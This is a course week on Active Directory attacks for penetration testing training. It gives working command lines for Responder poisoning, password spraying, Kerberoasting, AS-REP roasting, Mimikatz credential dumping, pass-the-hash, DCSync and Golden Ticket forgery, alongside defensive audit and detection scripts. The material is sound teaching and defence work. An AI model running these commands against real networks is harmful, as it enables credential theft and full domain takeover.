CSY202 Week 10 Intermediate

Opening Framing: The Crown Jewels

Active Directory (AD) manages authentication and authorization for most enterprise Windows environments. It controls who can access what across thousands of computers and users. Domain Administrators have unrestricted access to every system.

For attackers, AD is the ultimate target. Compromise a Domain Admin account and you own the entire organization. For pentesters, demonstrating AD compromise shows maximum impact.

This week covers Active Directory fundamentals, enumeration, common attack paths, and the journey from domain user to Domain Admin.

Key insight: Most enterprise breaches end with AD compromise. Understanding AD attacks is essential for both offense and defense.

1) Active Directory Fundamentals

Understanding AD architecture:

Active Directory Components:

Domain:
- Logical grouping of objects
- Users, computers, groups
- Shares common database
- Example: corp.company.com

Domain Controller (DC):
- Server that hosts AD
- Authenticates users
- Enforces policies
- Replicates with other DCs

Forest:
- Collection of domains
- Trust relationships
- Shared schema and config

Organizational Units (OUs):
- Containers for organizing objects
- Apply Group Policies
- Delegate administration

Objects:
- Users, computers, groups
- Each has attributes
- Identified by SID

Kerberos Authentication:

Kerberos Flow:

1. User logs in
   → Sends request to Domain Controller (KDC)

2. AS-REQ/AS-REP (Authentication Service)
   → User proves identity
   → Receives TGT (Ticket Granting Ticket)

3. TGS-REQ/TGS-REP (Ticket Granting Service)
   → User presents TGT
   → Requests access to specific service
   → Receives Service Ticket

4. Service Access
   → User presents Service Ticket
   → Service grants access

Key concepts:
- TGT: Proves you authenticated
- Service Ticket: Proves you can access service
- Tickets have expiration
- Tickets can be stolen/forged (attacks!)

┌──────┐     AS-REQ      ┌──────┐
│ User │ ───────────────→│  DC  │
│      │←─── TGT ────────│ (KDC)│
│      │                 │      │
│      │    TGS-REQ      │      │
│      │ ───────────────→│      │
│      │←─ Svc Ticket ───│      │
└──────┘                 └──────┘
    │
    │    Service Ticket
    ↓
┌──────┐
│Server│
└──────┘

NTLM Authentication:

NTLM (older, still used):

1. User sends username
2. Server sends challenge
3. User computes a response from the challenge using the password hash
4. Server verifies

Why NTLM matters:
- Still widely used
- Hash can be captured and cracked
- Pass-the-Hash attacks possible
- NetNTLMv2 captured via Responder

Key insight: Kerberos and NTLM authentication mechanisms have weaknesses that enable powerful attacks.

2) AD Enumeration

Mapping the domain before attacking:

Initial Enumeration:

# From domain-joined Windows machine:

# Current domain info
echo %userdomain%
echo %logonserver%
systeminfo | findstr /B "Domain"

# Domain Controller
nltest /dclist:domain.local
nslookup -type=srv _ldap._tcp.dc._msdcs.domain.local

# Current user context
whoami /all
net user %username% /domain

# Domain users
net user /domain
net user administrator /domain

# Domain groups
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain

# Domain computers
net view /domain
net group "Domain Computers" /domain

PowerView Enumeration:

# PowerView - PowerShell AD enumeration
# https://github.com/PowerShellMafia/PowerSploit

Import-Module .\PowerView.ps1

# Domain info
Get-Domain
Get-DomainController

# Users
Get-DomainUser
Get-DomainUser -Identity administrator
Get-DomainUser -Properties samaccountname,description

# Groups
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"

# Computers
Get-DomainComputer
Get-DomainComputer -Properties dnshostname,operatingsystem

# Find interesting ACLs
Find-InterestingDomainAcl

# Find local admins on machines
Find-LocalAdminAccess

# Find where domain admins are logged in
Find-DomainUserLocation

# Find shares
Find-DomainShare -CheckShareAccess

BloodHound - Attack Path Mapping:

# BloodHound visualizes AD attack paths

# 1. Collect data with SharpHound
.\SharpHound.exe -c all
# Creates .zip file with JSON data

# 2. Start BloodHound
sudo neo4j start
bloodhound

# 3. Import data
# Drag and drop .zip file

# 4. Run queries:
# - Find all Domain Admins
# - Shortest path to Domain Admin
# - Find Kerberoastable users
# - Find AS-REP roastable users
# - Find computers with unconstrained delegation

# Key paths to look for:
# - Users with admin rights on machines
# - Users with DCSync rights
# - Paths through group membership
# - Paths through ACL abuse

LDAP Enumeration:

# From Linux with credentials:

# ldapsearch
ldapsearch -x -H ldap://dc.domain.local -D "user@domain.local" -w 'password' -b "dc=domain,dc=local" "(objectClass=user)"

# ldapdomaindump
ldapdomaindump -u 'domain\user' -p 'password' dc.domain.local

# windapsearch
./windapsearch.py -d domain.local -u user -p password --dc-ip 192.168.1.1 -U
./windapsearch.py -d domain.local -u user -p password --dc-ip 192.168.1.1 --da

Key insight: Enumeration reveals attack paths. BloodHound especially shows routes to Domain Admin you might miss manually.

3) Initial Access and Credential Attacks

Getting that first foothold in AD:

LLMNR/NBT-NS Poisoning:

# Responder captures NetNTLMv2 hashes

# When user mistypes share name:
\\fileservrr\share
# Windows broadcasts LLMNR/NBT-NS request
# Attacker responds: "I'm that server!"
# User sends credentials

# Run Responder
sudo responder -I eth0 -wrf

# Captured hashes appear in console and logs
# /usr/share/responder/logs/

# Crack with hashcat
hashcat -m 5600 hash.txt wordlist.txt

# Or relay with ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support

Password Spraying:

# Try common passwords against many users

# Get user list first (one name per line, no table header, so spraying tools can read it)
Get-DomainUser | Select-Object -ExpandProperty samaccountname | Out-File users.txt

# Common spray passwords:
# Season + Year: Summer2024!
# Company + numbers: Acme2024!
# Welcome patterns: Welcome1!

# With crackmapexec
crackmapexec smb dc.domain.local -u users.txt -p 'Summer2024!' --continue-on-success

# With kerbrute (faster, uses Kerberos)
./kerbrute passwordspray -d domain.local users.txt 'Summer2024!'

# Check password policy first!
net accounts /domain
# Note lockout threshold and duration

AS-REP Roasting:

# Attack users without Kerberos pre-auth

# Find vulnerable users
Get-DomainUser -PreauthNotRequired

# Request AS-REP (no password needed!)
# With Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

# With GetNPUsers.py (from Linux)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt

# Crack the hash
hashcat -m 18200 asrep.txt wordlist.txt

Kerberoasting:

# Attack service accounts

# Service accounts have SPNs (Service Principal Names)
# Anyone can request service tickets
# Tickets encrypted with service account password
# Crack offline!

# Find Kerberoastable accounts
Get-DomainUser -SPN

# Request tickets with Rubeus
.\Rubeus.exe kerberoast /format:hashcat /outfile:kerberoast.txt

# With GetUserSPNs.py (from Linux)
GetUserSPNs.py domain.local/user:password -request -outputfile kerberoast.txt

# Crack the hash
hashcat -m 13100 kerberoast.txt wordlist.txt

# Service accounts often have weak passwords
# Or never-changed passwords

Key insight: Kerberoasting and AS-REP roasting are powerful because they don't require special access—any domain user can do them.
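The flip side of the two roasting attacks above is an audit: the same attributes PowerView reads (`userAccountControl`, `servicePrincipalName`, `pwdLastSet`, `adminCount`) tell a defender which accounts are exposed. The script below is an added example, not course code; it runs over constructed user records shaped like those LDAP attributes (no domain connection), and the `0x10200` base value is just NORMAL_ACCOUNT with DONT_EXPIRE_PASSWORD, chosen to make the samples realistic.

```python
"""Audit constructed AD user records for AS-REP roastable and Kerberoastable
accounts. Added example for this page (not course-provided code); the records
below are made up and shaped like the attributes Get-DomainUser returns."""
from datetime import datetime, timedelta, timezone

# userAccountControl bits (values from the Windows UF_* flag definitions)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000      # "Do not require Kerberos preauthentication"

MAX_SPN_PASSWORD_AGE = timedelta(days=365)   # policy threshold assumed for this example
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)   # fixed clock so results are reproducible

# Constructed sample records (not real accounts)
SAMPLE_USERS = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "pwdLastSet": datetime(2019, 3, 4, tzinfo=timezone.utc), "adminCount": 1},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": [],
     "pwdLastSet": datetime(2024, 5, 1, tzinfo=timezone.utc), "adminCount": 0},
    {"sAMAccountName": "old_svc",
     "userAccountControl": 0x10200 | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH,
     "servicePrincipalName": ["HTTP/legacy.corp.local"],
     "pwdLastSet": datetime(2016, 1, 1, tzinfo=timezone.utc), "adminCount": 0},
    {"sAMAccountName": "asmith", "userAccountControl": 0x10200,
     "servicePrincipalName": [],
     "pwdLastSet": datetime(2024, 4, 10, tzinfo=timezone.utc), "adminCount": 0},
]

def audit_user(user, now=NOW):
    """Return the list of finding codes for one user record (empty = nothing to fix)."""
    findings = []
    uac = user["userAccountControl"]
    if uac & UF_ACCOUNTDISABLE:
        return findings                      # a disabled account cannot be roasted
    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append("ASREP_ROASTABLE")   # fix: re-enable pre-authentication
    if user["servicePrincipalName"]:
        findings.append("KERBEROASTABLE")    # any domain user can request its ticket
        if now - user["pwdLastSet"] > MAX_SPN_PASSWORD_AGE:
            findings.append("STALE_SPN_PASSWORD")      # fix: long random password or gMSA
        if user.get("adminCount"):
            findings.append("PRIVILEGED_SPN_ACCOUNT")  # cracking it hands over admin rights
    return findings

def audit_domain(users, now=NOW):
    """Map account name -> findings, keeping only accounts with at least one finding."""
    return {u["sAMAccountName"]: f for u in users if (f := audit_user(u, now))}

if __name__ == "__main__":
    for name, findings in audit_domain(SAMPLE_USERS).items():
        print(f"{name}: {', '.join(findings)}")
```

Run against real data by replacing `SAMPLE_USERS` with records exported from `Get-DomainUser -Properties samaccountname,useraccountcontrol,serviceprincipalname,pwdlastset,admincount`; the interesting output is a privileged service account with a years-old password, which is exactly the case the Kerberoasting notes above describe.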

4) Lateral Movement in AD

Moving through the domain:

Pass-the-Hash:

# Use NTLM hash instead of password

# Dump hashes (if local admin)
mimikatz > sekurlsa::logonpasswords

# Pass-the-Hash with various tools:

# crackmapexec
crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:hash

# psexec.py
psexec.py -hashes :hash domain/administrator@target

# evil-winrm
evil-winrm -i target -u administrator -H hash

# wmiexec.py
wmiexec.py -hashes :hash domain/administrator@target

# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd

Pass-the-Ticket:

# Use Kerberos tickets instead of password

# Export tickets from memory
mimikatz > sekurlsa::tickets /export

# Or with Rubeus
.\Rubeus.exe dump

# Import ticket
mimikatz > kerberos::ptt ticket.kirbi
.\Rubeus.exe ptt /ticket:base64ticket

# Now use Kerberos auth to access resources
dir \\server\share

Overpass-the-Hash:

# Use NTLM hash to get Kerberos ticket

# With Mimikatz
sekurlsa::pth /user:admin /domain:domain.local /ntlm:hash /run:powershell

# This spawns process with Kerberos ticket
# Now can access Kerberos-only resources

# With Rubeus
.\Rubeus.exe asktgt /user:admin /rc4:hash /ptt

Remote Execution Methods:

# Various ways to execute on remote systems:

# PSExec (creates service)
psexec.py domain/admin:password@target

# WMI (uses WMI)
wmiexec.py domain/admin:password@target

# SMBExec (uses services)
smbexec.py domain/admin:password@target

# WinRM (uses Windows Remote Management)
evil-winrm -i target -u admin -p password

# DCOM (uses DCOM)
dcomexec.py domain/admin:password@target

# Each has different detection signatures
# Each requires different ports/services

Key insight: Captured credentials enable movement throughout the domain. One admin hash can unlock many systems.

5) Domain Privilege Escalation

From domain user to Domain Admin:

ACL Abuse:

# Active Directory permissions can be exploited

# Common dangerous permissions:
# - GenericAll: Full control
# - GenericWrite: Modify attributes
# - WriteOwner: Take ownership
# - WriteDACL: Modify permissions
# - ForceChangePassword: Reset password

# Find with PowerView
Find-InterestingDomainAcl -ResolveGUIDs

# Or BloodHound queries

# Example: User has GenericAll on another user
# Reset their password!
net user targetuser NewPassword123! /domain

# Example: User has GenericWrite on group
# Add yourself to group!
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker

Unconstrained Delegation:

# Computers with unconstrained delegation
# Cache TGTs of users who connect

# Find delegation computers
Get-DomainComputer -Unconstrained

# If you compromise such a computer:
# Wait for Domain Admin to connect
# Their TGT is cached
# Extract and use it

# Extract with Mimikatz
sekurlsa::tickets /export

# Or coerce authentication with PrinterBug/PetitPotam
SpoolSample.exe DC.domain.local AttackerMachine.domain.local

DCSync Attack:

# Replicate credentials from Domain Controller
# Requires: Replicating Directory Changes rights
# Domain Admins have this by default

# With Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:administrator

# With secretsdump.py
secretsdump.py domain/admin:password@dc.domain.local

# Gets NTLM hashes of any user
# Including krbtgt (for Golden Ticket)

Golden Ticket:

# Forge TGT valid for any user

# Need:
# - krbtgt NTLM hash (from DCSync)
# - Domain SID
# - Domain name

# Get domain SID
Get-DomainSID

# Create Golden Ticket with Mimikatz
kerberos::golden /user:FakeAdmin /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

# Now you're Domain Admin!
# Valid for 10 years by default
# Survives password resets (except krbtgt)

# With ticketer.py
ticketer.py -nthash krbtgt_hash -domain-sid S-1-5-21-... -domain domain.local FakeAdmin

Key insight: DCSync and Golden Ticket are endgame attacks. Once you have krbtgt hash, you own the domain permanently.
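The Kerberos flow from section 1 and the krbtgt notes above (a forged TGT "survives password resets except krbtgt", and persists until krbtgt is reset twice) fit in one small model. The code below is an added example, not course code: HMAC-SHA256 tags stand in for real ticket encryption, the realm, account names and keys are made up, and the KDC keeps exactly one previous krbtgt key, which is the behaviour that makes a single reset insufficient. It walks AS-REQ/AS-REP, TGS-REQ/TGS-REP and service access, then shows the same TGT still being honoured after one krbtgt rotation and rejected after two.

```python
"""Toy Kerberos exchange plus krbtgt key rotation. Added example for this
page, not course code: HMAC-SHA256 models ticket encryption, and all names and
keys are made up."""
import hashlib, hmac, json
from datetime import datetime, timedelta, timezone

def seal(key, body):
    """Tag a ticket body with a key; only the key holder can produce a valid tag."""
    msg = json.dumps(body, sort_keys=True).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()

def valid_seal(key, ticket):
    return hmac.compare_digest(seal(key, ticket["body"]), ticket["tag"])

def client_preauth(user_key, now):
    """Timestamp pre-authentication: proves the client knows its own key."""
    return seal(user_key, {"timestamp": now.isoformat()})

class KDC:
    TICKET_LIFETIME = timedelta(hours=10)

    def __init__(self, realm, krbtgt_key, user_keys, service_keys):
        self.realm = realm
        self.kvno = 1                           # krbtgt key version number
        self.krbtgt_keys = {1: krbtgt_key}      # kvno -> key; current and previous are kept
        self.user_keys = user_keys
        self.service_keys = service_keys

    def as_exchange(self, user, preauth, now):
        """AS-REQ/AS-REP: check pre-auth, return a TGT sealed with the krbtgt key."""
        expected = client_preauth(self.user_keys[user], now)
        if not hmac.compare_digest(expected, preauth):
            raise PermissionError("AS-REQ rejected: pre-authentication failed")
        body = {"type": "TGT", "cname": user, "realm": self.realm, "kvno": self.kvno,
                "endtime": (now + self.TICKET_LIFETIME).isoformat()}
        return {"body": body, "tag": seal(self.krbtgt_keys[self.kvno], body)}

    def tgs_exchange(self, tgt, service, now):
        """TGS-REQ/TGS-REP: validate the TGT, return a ticket sealed with the service key."""
        key = self.krbtgt_keys.get(tgt["body"]["kvno"])
        if key is None or not valid_seal(key, tgt):
            raise PermissionError("TGS-REQ rejected: TGT not sealed with an accepted krbtgt key")
        if datetime.fromisoformat(tgt["body"]["endtime"]) < now:
            raise PermissionError("TGS-REQ rejected: TGT expired")
        body = {"type": "ST", "cname": tgt["body"]["cname"], "sname": service,
                "endtime": (now + self.TICKET_LIFETIME).isoformat()}
        return {"body": body, "tag": seal(self.service_keys[service], body)}

    def rotate_krbtgt(self, new_key):
        """Model of a krbtgt password reset. The previous key stays accepted so
        in-flight tickets keep working; a ticket sealed with an older key is
        therefore honoured after one reset and rejected only after two."""
        self.kvno += 1
        self.krbtgt_keys[self.kvno] = new_key
        for old in [v for v in self.krbtgt_keys if v < self.kvno - 1]:
            del self.krbtgt_keys[old]

def service_accepts(service_key, ticket, service, now):
    """The server side: it knows only its own key and checks name and expiry."""
    b = ticket["body"]
    return (b["type"] == "ST" and b["sname"] == service
            and valid_seal(service_key, ticket)
            and datetime.fromisoformat(b["endtime"]) >= now)

def tgt_still_usable(kdc, tgt, service, now):
    try:
        kdc.tgs_exchange(tgt, service, now)
        return True
    except PermissionError:
        return False

def demo():
    now = datetime(2024, 6, 1, 9, 0, tzinfo=timezone.utc)
    kdc = KDC("CORP.LOCAL", b"krbtgt-key-v1",
              {"alice": b"alice-key"}, {"cifs/fs01": b"fs01-key"})
    results = {}
    try:                                   # wrong key at AS-REQ: pre-auth blocks it
        kdc.as_exchange("alice", client_preauth(b"guessed-key", now), now)
        results["wrong_preauth_rejected"] = False
    except PermissionError:
        results["wrong_preauth_rejected"] = True
    tgt = kdc.as_exchange("alice", client_preauth(b"alice-key", now), now)
    st = kdc.tgs_exchange(tgt, "cifs/fs01", now)
    results["service_access"] = service_accepts(b"fs01-key", st, "cifs/fs01", now)
    kdc.rotate_krbtgt(b"krbtgt-key-v2")    # first reset: old TGT still accepted
    results["tgt_after_one_reset"] = tgt_still_usable(kdc, tgt, "cifs/fs01", now)
    kdc.rotate_krbtgt(b"krbtgt-key-v3")    # second reset: old key gone, TGT rejected
    results["tgt_after_two_resets"] = tgt_still_usable(kdc, tgt, "cifs/fs01", now)
    return results

if __name__ == "__main__":
    print(demo())
```

The point for defenders is in the last three lines of `demo()`: a ticket minted under an old krbtgt key (legitimately issued here, but a forged one is no different to the KDC) keeps working through the first reset, which is why incident response guidance resets krbtgt twice, with a replication interval in between.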

Real-World Context: AD Attacks in Practice

Professional considerations for AD attacks:

Detection: AD attacks are increasingly detected. Kerberoasting, DCSync, and Golden Tickets all have detection signatures. Modern SOCs watch for these. In red team engagements, stealth matters.
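The detection signatures mentioned above can be stated as rules over Windows Security events. The script below is an added example, not course material: it encodes four of them (Kerberoasting as a burst of RC4 service-ticket requests from one source, AS-REP roasting as a TGT issued with pre-auth type 0, DCSync as replication extended rights used by a non-computer account, password spraying as pre-auth failures for many accounts from one source) and runs them over constructed events. Event IDs 4769, 4768, 4662 and 4771, the field names and the replication-right GUIDs are the real Windows values; the IPs, account names and thresholds are made up for the sample.

```python
"""Detection rules for the AD attacks on this page, run over constructed
Windows Security events. Added example, not course code; event IDs, field
names and GUIDs are the real Windows values, all sample values are made up."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                      # TicketEncryptionType value for RC4; AES is 0x11/0x12
# Extended rights that allow directory replication (what DCSync exercises)
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",   # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",   # DS-Replication-Get-Changes-In-Filtered-Set
}

def ev(eid, ts, **fields):
    return {"EventID": eid, "TimeCreated": datetime.fromisoformat(ts), **fields}

SAMPLE_EVENTS = [   # constructed sample log
    # one workstation requests RC4 service tickets for three different SPNs in seconds
    ev(4769, "2024-06-01T09:00:01", TargetUserName="jdoe@CORP.LOCAL", ServiceName="svc_sql",
       TicketEncryptionType=RC4_HMAC, IpAddress="10.0.0.55"),
    ev(4769, "2024-06-01T09:00:02", TargetUserName="jdoe@CORP.LOCAL", ServiceName="svc_web",
       TicketEncryptionType=RC4_HMAC, IpAddress="10.0.0.55"),
    ev(4769, "2024-06-01T09:00:03", TargetUserName="jdoe@CORP.LOCAL", ServiceName="svc_backup",
       TicketEncryptionType=RC4_HMAC, IpAddress="10.0.0.55"),
    ev(4769, "2024-06-01T09:05:00", TargetUserName="asmith@CORP.LOCAL", ServiceName="krbtgt",
       TicketEncryptionType="0x12", IpAddress="10.0.0.20"),        # normal AES renewal
    # TGT issued without pre-authentication (account has pre-auth disabled)
    ev(4768, "2024-06-01T09:10:00", TargetUserName="jdoe", PreAuthType="0",
       TicketEncryptionType=RC4_HMAC, IpAddress="10.0.0.99"),
    ev(4768, "2024-06-01T09:10:05", TargetUserName="asmith", PreAuthType="2",
       TicketEncryptionType="0x12", IpAddress="10.0.0.20"),
    # replication rights used by a user account versus by a domain controller
    ev(4662, "2024-06-01T09:20:00", SubjectUserName="jdoe",
       Properties="{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    ev(4662, "2024-06-01T09:20:01", SubjectUserName="DC02$",
       Properties="{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # pre-auth failures for several accounts from one address within seconds
    ev(4771, "2024-06-01T09:30:00", TargetUserName="u1", IpAddress="10.0.0.99"),
    ev(4771, "2024-06-01T09:30:01", TargetUserName="u2", IpAddress="10.0.0.99"),
    ev(4771, "2024-06-01T09:30:02", TargetUserName="u3", IpAddress="10.0.0.99"),
    ev(4771, "2024-06-01T09:30:03", TargetUserName="u1", IpAddress="10.0.0.99"),  # repeat
    ev(4771, "2024-06-01T10:30:00", TargetUserName="u4", IpAddress="10.0.0.21"),  # one typo
]

def _burst_sources(events, key, window, threshold):
    """IPs whose events contain >= threshold distinct `key` values inside one window."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["IpAddress"]].append(e)
    hits = set()
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        for i, first in enumerate(evs):
            in_win = [x for x in evs[i:] if x["TimeCreated"] - first["TimeCreated"] <= window]
            if len({x[key] for x in in_win}) >= threshold:
                hits.add(src)
                break
    return sorted(hits)

def detect_kerberoast(events, window=timedelta(minutes=5), min_services=3):
    rc4 = [e for e in events if e["EventID"] == 4769
           and e["TicketEncryptionType"] == RC4_HMAC and e["ServiceName"] != "krbtgt"]
    return _burst_sources(rc4, "ServiceName", window, min_services)

def detect_asrep_roast(events):
    """PreAuthType 0 on a 4768 means the account has pre-authentication disabled."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == 4768 and e["PreAuthType"] == "0"})

def detect_dcsync(events):
    """Replication rights exercised by anything that is not a computer account."""
    return sorted({e["SubjectUserName"] for e in events
                   if e["EventID"] == 4662 and not e["SubjectUserName"].endswith("$")
                   and any(g in e["Properties"].lower() for g in REPLICATION_GUIDS)})

def detect_spray(events, window=timedelta(minutes=5), min_accounts=3):
    fails = [e for e in events if e["EventID"] == 4771]
    return _burst_sources(fails, "TargetUserName", window, min_accounts)

def run_all(events=SAMPLE_EVENTS):
    return {"kerberoast_sources": detect_kerberoast(events),
            "asrep_roastable_accounts": detect_asrep_roast(events),
            "dcsync_accounts": detect_dcsync(events),
            "spray_sources": detect_spray(events)}

if __name__ == "__main__":
    print(run_all())
```

Two caveats when moving this onto real logs: 4769 and 4662 only appear if the "Audit Kerberos Service Ticket Operations" and "Audit Directory Service Access" subcategories (with a SACL on the domain object) are enabled, and the RC4 rule alone misses AES-only ticket requests, so pair it with a per-source volume baseline.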

Domain Controller Access: Touching DCs directly is risky and often unnecessary. DCSync can be done remotely. Avoid RDP to DCs if possible.

Persistence: Golden Tickets persist until krbtgt password is reset twice. This is the ultimate persistence mechanism in AD.

MITRE ATT&CK Mapping:

  • T1558 - Steal or Forge Kerberos Tickets: Golden/Silver Tickets
  • T1550 - Use Alternate Authentication Material: Pass-the-Hash/Ticket
  • T1003.006 - DCSync: Credential dumping via replication
  • T1557 - LLMNR/NBT-NS Poisoning: Responder attacks

Key insight: AD attacks demonstrate enterprise-wide impact. A single compromised user can lead to complete domain takeover.

Guided Lab: AD Attack Simulation

Simulate AD attacks (requires AD lab environment).

Lab Environment Options

# Building an AD lab:

Option 1: Local VMs
- Windows Server 2019 (Domain Controller)
- Windows 10 (workstation, domain-joined)
- Kali Linux (attacker)

Option 2: Cloud/Pre-built
- DVAD (Damn Vulnerable AD)
- GOAD (Game of Active Directory)
- Detection Lab by Chris Long

Option 3: Online platforms
- HackTheBox Pro Labs
- TryHackMe AD rooms
- PentesterLab

Step 1: Enumeration

# If you have AD access:

# Basic enumeration
net user /domain
net group "Domain Admins" /domain

# PowerView
Import-Module .\PowerView.ps1
Get-Domain
Get-DomainUser
Get-DomainGroup -Identity "Domain Admins"
Find-LocalAdminAccess

Step 2: Kerberoasting

# Find SPN accounts
Get-DomainUser -SPN

# Request tickets
.\Rubeus.exe kerberoast /format:hashcat

# Crack offline
hashcat -m 13100 kerberoast.txt wordlist.txt

Step 3: Lateral Movement

# With captured credentials:
crackmapexec smb targets -u user -p password

# Admin access shows as (Pwn3d!) in the output; --local-auth tests a local account instead of a domain one
crackmapexec smb targets -u user -p password --local-auth

# Execute if admin
psexec.py domain/user:password@target

Step 4: Domain Escalation

# If Domain Admin achieved:
secretsdump.py domain/admin:password@dc

# Extract krbtgt hash
# Create Golden Ticket for persistence

Reflection (mandatory)

  1. What was the attack path from user to Domain Admin?
  2. Which techniques would be detected by a SOC?
  3. How would you defend against these attacks?
  4. What surprised you about AD security?

Week 10 Outcome Check

By the end of this week, you should be able to:

Next week: Wireless and Network Attacks—beyond the wire.

🎯 Hands-On Labs (Free & Essential)

Practice AD attacks before moving to reading resources.

🎮 TryHackMe: Active Directory Basics

What you'll do: Learn AD fundamentals and environment structure.
Why it matters: You need AD context before running attacks.
Time estimate: 1.5-2 hours


🎮 TryHackMe: Attacktive Directory

What you'll do: Enumerate AD, exploit misconfigs, and escalate privileges.
Why it matters: This is a full AD attack chain lab.
Time estimate: 2-3 hours


🎮 TryHackMe: BloodHound

What you'll do: Visualize privilege paths and find attack routes.
Why it matters: BloodHound is the standard for AD pathing.
Time estimate: 1-2 hours


🛡️ Lab: Explore NIST Post-Quantum Crypto

What you'll do: Review NIST PQC candidates and summarize enterprise impact.
Deliverable: One-page summary of 2 algorithms and migration considerations.
Why it matters: Enterprise auth stacks will shift as PQC matures.
Time estimate: 45-60 minutes

💡 Lab Tip: Document the full attack path from user to domain admin in one diagram.

🛡️ Modern Cryptography Outlook

Enterprise identity systems depend on cryptography. As post-quantum algorithms mature, attackers and defenders will adapt.

Emerging focus areas:
- Post-quantum key exchange
- Hybrid TLS deployments
- Long-term certificate agility
- Migration planning and crypto inventories

📚 Building on CSY101 Week-14: Tie crypto agility to governance and risk planning.

Resources

Complete the required resources to build your foundation.

Lab: Active Directory Attack Path

Goal: Map and exploit attack paths in an AD environment.

Part 1: Build or Access AD Lab

  1. Set up local AD lab, or
  2. Use online platform (TryHackMe, HackTheBox)
  3. Document your lab environment

Part 2: Enumeration

  1. Run SharpHound and import to BloodHound
  2. Identify all Domain Admins
  3. Find shortest path to Domain Admin
  4. Identify Kerberoastable accounts
  5. Document interesting findings

Part 3: Initial Compromise

  1. Attempt Kerberoasting
  2. Attempt AS-REP roasting
  3. Crack any captured hashes
  4. Document credentials obtained

Part 4: Privilege Escalation

  1. Use credentials for lateral movement
  2. Identify path to Domain Admin
  3. Execute privilege escalation
  4. Demonstrate Domain Admin access

Part 5: Documentation

  1. Create attack path diagram
  2. Document each step with evidence
  3. Provide defensive recommendations

Deliverable (submit):

Checkpoint Questions

  1. What is the difference between NTLM and Kerberos authentication?
  2. What is Kerberoasting and why is it effective?
  3. What is a TGT and how is it used?
  4. What is Pass-the-Hash and when can it be used?
  5. What is DCSync and what rights does it require?
  6. What is a Golden Ticket and why is it significant?

Week 10 Quiz

Test your understanding of Active Directory attacks, Kerberos authentication, and domain escalation.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.


Weekly Reflection

Reflection Prompt (200-300 words):

This week you learned Active Directory attacks—techniques that can lead to complete enterprise compromise. You explored authentication weaknesses and privilege escalation paths.

Reflect on these questions:

A strong reflection will connect attack techniques to defensive strategies and organizational practices.

Verified Resources & Videos

Active Directory attacks are often the path to complete enterprise compromise. The techniques you've learned are used in real-world breaches daily. Understanding them from both offensive and defensive perspectives is essential for any security professional. Next week: wireless and network attacks.
